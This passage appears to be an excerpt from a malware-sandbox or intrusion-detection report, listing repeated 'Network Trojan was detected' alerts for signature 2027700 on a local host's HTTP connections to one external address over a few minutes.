                          SID:2027700
                          Source Port:49955
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450136802027700 02/06/23-14:18:48.120124
                          SID:2027700
                          Source Port:50136
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449777802027700 02/06/23-14:17:05.460296
                          SID:2027700
                          Source Port:49777
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450266802027700 02/06/23-14:19:23.059192
                          SID:2027700
                          Source Port:50266
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450059802027700 02/06/23-14:18:27.376298
                          SID:2027700
                          Source Port:50059
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450157802027700 02/06/23-14:18:54.822506
                          SID:2027700
                          Source Port:50157
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450062802027700 02/06/23-14:18:28.208950
                          SID:2027700
                          Source Port:50062
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449829802027700 02/06/23-14:17:24.880677
                          SID:2027700
                          Source Port:49829
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449927802027700 02/06/23-14:17:51.554248
                          SID:2027700
                          Source Port:49927
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449832802027700 02/06/23-14:17:25.693521
                          SID:2027700
                          Source Port:49832
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450160802027700 02/06/23-14:18:55.547495
                          SID:2027700
                          Source Port:50160
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449734802027700 02/06/23-14:16:51.611739
                          SID:2027700
                          Source Port:49734
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450001802027700 02/06/23-14:18:11.711181
                          SID:2027700
                          Source Port:50001
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450255802027700 02/06/23-14:19:20.388213
                          SID:2027700
                          Source Port:50255
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449930802027700 02/06/23-14:17:53.103784
                          SID:2027700
                          Source Port:49930
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449988802027700 02/06/23-14:18:08.271366
                          SID:2027700
                          Source Port:49988
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449762802027700 02/06/23-14:17:01.814767
                          SID:2027700
                          Source Port:49762
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450090802027700 02/06/23-14:18:36.931058
                          SID:2027700
                          Source Port:50090
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449860802027700 02/06/23-14:17:33.773507
                          SID:2027700
                          Source Port:49860
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449767802027700 02/06/23-14:17:03.053144
                          SID:2027700
                          Source Port:49767
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450095802027700 02/06/23-14:18:38.133971
                          SID:2027700
                          Source Port:50095
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450193802027700 02/06/23-14:19:03.417591
                          SID:2027700
                          Source Port:50193
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449963802027700 02/06/23-14:18:02.243572
                          SID:2027700
                          Source Port:49963
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449804802027700 02/06/23-14:17:18.644415
                          SID:2027700
                          Source Port:49804
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450132802027700 02/06/23-14:18:47.164865
                          SID:2027700
                          Source Port:50132
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449770802027700 02/06/23-14:17:03.784821
                          SID:2027700
                          Source Port:49770
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449983802027700 02/06/23-14:18:07.033596
                          SID:2027700
                          Source Port:49983
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449692802027700 02/06/23-14:16:29.077816
                          SID:2027700
                          Source Port:49692
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450227802027700 02/06/23-14:19:13.545015
                          SID:2027700
                          Source Port:50227
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450222802027700 02/06/23-14:19:12.337102
                          SID:2027700
                          Source Port:50222
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449739802027700 02/06/23-14:16:52.782774
                          SID:2027700
                          Source Port:49739
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450185802027700 02/06/23-14:19:01.492596
                          SID:2027700
                          Source Port:50185
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449898802027700 02/06/23-14:17:44.411727
                          SID:2027700
                          Source Port:49898
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450104802027700 02/06/23-14:18:40.328930
                          SID:2027700
                          Source Port:50104
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449857802027700 02/06/23-14:17:31.816085
                          SID:2027700
                          Source Port:49857
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449893802027700 02/06/23-14:17:43.066540
                          SID:2027700
                          Source Port:49893
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449935802027700 02/06/23-14:17:55.397933
                          SID:2027700
                          Source Port:49935
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449697802027700 02/06/23-14:16:30.331432
                          SID:2027700
                          Source Port:49697
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450026802027700 02/06/23-14:18:19.334487
                          SID:2027700
                          Source Port:50026
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450067802027700 02/06/23-14:18:29.442348
                          SID:2027700
                          Source Port:50067
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450263802027700 02/06/23-14:19:22.314339
                          SID:2027700
                          Source Port:50263
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449754802027700 02/06/23-14:16:59.800602
                          SID:2027700
                          Source Port:49754
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449852802027700 02/06/23-14:17:30.586454
                          SID:2027700
                          Source Port:49852
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450082802027700 02/06/23-14:18:34.947434
                          SID:2027700
                          Source Port:50082
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449840802027700 02/06/23-14:17:27.625203
                          SID:2027700
                          Source Port:49840
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450079802027700 02/06/23-14:18:34.225155
                          SID:2027700
                          Source Port:50079
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450202802027700 02/06/23-14:19:05.591074
                          SID:2027700
                          Source Port:50202
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450018802027700 02/06/23-14:18:17.421896
                          SID:2027700
                          Source Port:50018
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450198802027700 02/06/23-14:19:04.619860
                          SID:2027700
                          Source Port:50198
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450116802027700 02/06/23-14:18:43.292412
                          SID:2027700
                          Source Port:50116
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449907802027700 02/06/23-14:17:46.566675
                          SID:2027700
                          Source Port:49907
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449787802027700 02/06/23-14:17:07.919083
                          SID:2027700
                          Source Port:49787
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449910802027700 02/06/23-14:17:47.301539
                          SID:2027700
                          Source Port:49910
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449782802027700 02/06/23-14:17:06.679140
                          SID:2027700
                          Source Port:49782
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449824802027700 02/06/23-14:17:23.678413
                          SID:2027700
                          Source Port:49824
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450152802027700 02/06/23-14:18:53.649179
                          SID:2027700
                          Source Port:50152
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449809802027700 02/06/23-14:17:19.879293
                          SID:2027700
                          Source Port:49809
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450235802027700 02/06/23-14:19:15.519092
                          SID:2027700
                          Source Port:50235
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449726802027700 02/06/23-14:16:43.296877
                          SID:2027700
                          Source Port:49726
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450054802027700 02/06/23-14:18:26.116806
                          SID:2027700
                          Source Port:50054
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450137802027700 02/06/23-14:18:48.518586
                          SID:2027700
                          Source Port:50137
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449902802027700 02/06/23-14:17:45.366776
                          SID:2027700
                          Source Port:49902
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450230802027700 02/06/23-14:19:14.260159
                          SID:2027700
                          Source Port:50230
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449865802027700 02/06/23-14:17:36.266770
                          SID:2027700
                          Source Port:49865
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449718802027700 02/06/23-14:16:38.360119
                          SID:2027700
                          Source Port:49718
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449943802027700 02/06/23-14:17:57.392402
                          SID:2027700
                          Source Port:49943
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450271802027700 02/06/23-14:19:24.244810
                          SID:2027700
                          Source Port:50271
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449790802027700 02/06/23-14:17:11.646769
                          SID:2027700
                          Source Port:49790
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450087802027700 02/06/23-14:18:36.155229
                          SID:2027700
                          Source Port:50087
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450129802027700 02/06/23-14:18:46.436570
                          SID:2027700
                          Source Port:50129
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449946802027700 02/06/23-14:17:58.119195
                          SID:2027700
                          Source Port:49946
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449969802027700 02/06/23-14:18:03.665186
                          SID:2027700
                          Source Port:49969
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450020802027700 02/06/23-14:18:17.901532
                          SID:2027700
                          Source Port:50020
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449928802027700 02/06/23-14:17:51.819640
                          SID:2027700
                          Source Port:49928
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450061802027700 02/06/23-14:18:27.966194
                          SID:2027700
                          Source Port:50061
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449768802027700 02/06/23-14:17:03.301035
                          SID:2027700
                          Source Port:49768
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449987802027700 02/06/23-14:18:08.011491
                          SID:2027700
                          Source Port:49987
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449763802027700 02/06/23-14:17:02.065956
                          SID:2027700
                          Source Port:49763
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449964802027700 02/06/23-14:18:02.489492
                          SID:2027700
                          Source Port:49964
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449786802027700 02/06/23-14:17:07.678071
                          SID:2027700
                          Source Port:49786
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449982802027700 02/06/23-14:18:06.788989
                          SID:2027700
                          Source Port:49982
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450091802027700 02/06/23-14:18:37.165425
                          SID:2027700
                          Source Port:50091
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450211802027700 02/06/23-14:19:08.508471
                          SID:2027700
                          Source Port:50211
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449959802027700 02/06/23-14:18:01.254903
                          SID:2027700
                          Source Port:49959
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449800802027700 02/06/23-14:17:17.654882
                          SID:2027700
                          Source Port:49800
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450033802027700 02/06/23-14:18:21.009110
                          SID:2027700
                          Source Port:50033
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450030802027700 02/06/23-14:18:20.273308
                          SID:2027700
                          Source Port:50030
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450189802027700 02/06/23-14:19:02.451596
                          SID:2027700
                          Source Port:50189
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449956802027700 02/06/23-14:18:00.553096
                          SID:2027700
                          Source Port:49956
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450107802027700 02/06/23-14:18:41.040652
                          SID:2027700
                          Source Port:50107
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450048802027700 02/06/23-14:18:24.617450
                          SID:2027700
                          Source Port:50048
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449778802027700 02/06/23-14:17:05.707869
                          SID:2027700
                          Source Port:49778
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449892802027700 02/06/23-14:17:42.833784
                          SID:2027700
                          Source Port:49892
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450241802027700 02/06/23-14:19:16.998707
                          SID:2027700
                          Source Port:50241
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450226802027700 02/06/23-14:19:13.307960
                          SID:2027700
                          Source Port:50226
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449821802027700 02/06/23-14:17:22.892786
                          SID:2027700
                          Source Port:49821
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450063802027700 02/06/23-14:18:28.448526
                          SID:2027700
                          Source Port:50063
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449773802027700 02/06/23-14:17:04.487846
                          SID:2027700
                          Source Port:49773
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449913802027700 02/06/23-14:17:48.004988
                          SID:2027700
                          Source Port:49913
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449992802027700 02/06/23-14:18:09.210071
                          SID:2027700
                          Source Port:49992
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449995802027700 02/06/23-14:18:09.929475
                          SID:2027700
                          Source Port:49995
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449735802027700 02/06/23-14:16:51.844624
                          SID:2027700
                          Source Port:49735
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449776802027700 02/06/23-14:17:05.213338
                          SID:2027700
                          Source Port:49776
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449854802027700 02/06/23-14:17:31.105331
                          SID:2027700
                          Source Port:49854
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450005802027700 02/06/23-14:18:14.255721
                          SID:2027700
                          Source Port:50005
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449984802027700 02/06/23-14:18:07.273532
                          SID:2027700
                          Source Port:49984
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450176802027700 02/06/23-14:18:59.358931
                          SID:2027700
                          Source Port:50176
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449813802027700 02/06/23-14:17:20.872292
                          SID:2027700
                          Source Port:49813
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450135802027700 02/06/23-14:18:47.882067
                          SID:2027700
                          Source Port:50135
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449926802027700 02/06/23-14:17:51.137580
                          SID:2027700
                          Source Port:49926
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449707802027700 02/06/23-14:16:32.799134
                          SID:2027700
                          Source Port:49707
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450071802027700 02/06/23-14:18:31.257000
                          SID:2027700
                          Source Port:50071
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450254802027700 02/06/23-14:19:20.138555
                          SID:2027700
                          Source Port:50254
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449748802027700 02/06/23-14:16:58.336552
                          SID:2027700
                          Source Port:49748
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449967802027700 02/06/23-14:18:03.193009
                          SID:2027700
                          Source Port:49967
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450076802027700 02/06/23-14:18:33.527817
                          SID:2027700
                          Source Port:50076
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450213802027700 02/06/23-14:19:10.017712
                          SID:2027700
                          Source Port:50213
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450035802027700 02/06/23-14:18:21.518036
                          SID:2027700
                          Source Port:50035
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449789802027700 02/06/23-14:17:11.410184
                          SID:2027700
                          Source Port:49789
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450056802027700 02/06/23-14:18:26.630496
                          SID:2027700
                          Source Port:50056
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449694802027700 02/06/23-14:16:29.585296
                          SID:2027700
                          Source Port:49694
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450145802027700 02/06/23-14:18:51.997575
                          SID:2027700
                          Source Port:50145
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449783802027700 02/06/23-14:17:06.930392
                          SID:2027700
                          Source Port:49783
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449872802027700 02/06/23-14:17:37.956883
                          SID:2027700
                          Source Port:49872
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449933802027700 02/06/23-14:17:54.746193
                          SID:2027700
                          Source Port:49933
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449961802027700 02/06/23-14:18:01.749516
                          SID:2027700
                          Source Port:49961
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449844802027700 02/06/23-14:17:28.581102
                          SID:2027700
                          Source Port:49844
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450111802027700 02/06/23-14:18:42.055400
                          SID:2027700
                          Source Port:50111
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450117802027700 02/06/23-14:18:43.523915
                          SID:2027700
                          Source Port:50117
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449755802027700 02/06/23-14:17:00.032530
                          SID:2027700
                          Source Port:49755
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450200802027700 02/06/23-14:19:05.093129
                          SID:2027700
                          Source Port:50200
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450206802027700 02/06/23-14:19:06.573238
                          SID:2027700
                          Source Port:50206
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449951802027700 02/06/23-14:17:59.351611
                          SID:2027700
                          Source Port:49951
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449939802027700 02/06/23-14:17:56.379898
                          SID:2027700
                          Source Port:49939
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450022802027700 02/06/23-14:18:18.367475
                          SID:2027700
                          Source Port:50022
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449905802027700 02/06/23-14:17:46.099037
                          SID:2027700
                          Source Port:49905
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450196802027700 02/06/23-14:19:04.123385
                          SID:2027700
                          Source Port:50196
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450066802027700 02/06/23-14:18:29.146657
                          SID:2027700
                          Source Port:50066
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450173802027700 02/06/23-14:18:58.637896
                          SID:2027700
                          Source Port:50173
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449816802027700 02/06/23-14:17:21.645116
                          SID:2027700
                          Source Port:49816
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450262802027700 02/06/23-14:19:22.073797
                          SID:2027700
                          Source Port:50262
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449793802027700 02/06/23-14:17:12.843598
                          SID:2027700
                          Source Port:49793
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450084802027700 02/06/23-14:18:35.437223
                          SID:2027700
                          Source Port:50084
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449882802027700 02/06/23-14:17:40.393565
                          SID:2027700
                          Source Port:49882
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450257802027700 02/06/23-14:19:20.856195
                          SID:2027700
                          Source Port:50257
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449704802027700 02/06/23-14:16:32.045624
                          SID:2027700
                          Source Port:49704
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449923802027700 02/06/23-14:17:50.412938
                          SID:2027700
                          Source Port:49923
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449971802027700 02/06/23-14:18:04.128227
                          SID:2027700
                          Source Port:49971
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450127802027700 02/06/23-14:18:45.946491
                          SID:2027700
                          Source Port:50127
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449727802027700 02/06/23-14:16:43.531561
                          SID:2027700
                          Source Port:49727
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450168802027700 02/06/23-14:18:57.456115
                          SID:2027700
                          Source Port:50168
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450038802027700 02/06/23-14:18:22.237631
                          SID:2027700
                          Source Port:50038
                          Destination Port:80
                          Protocol:TCP
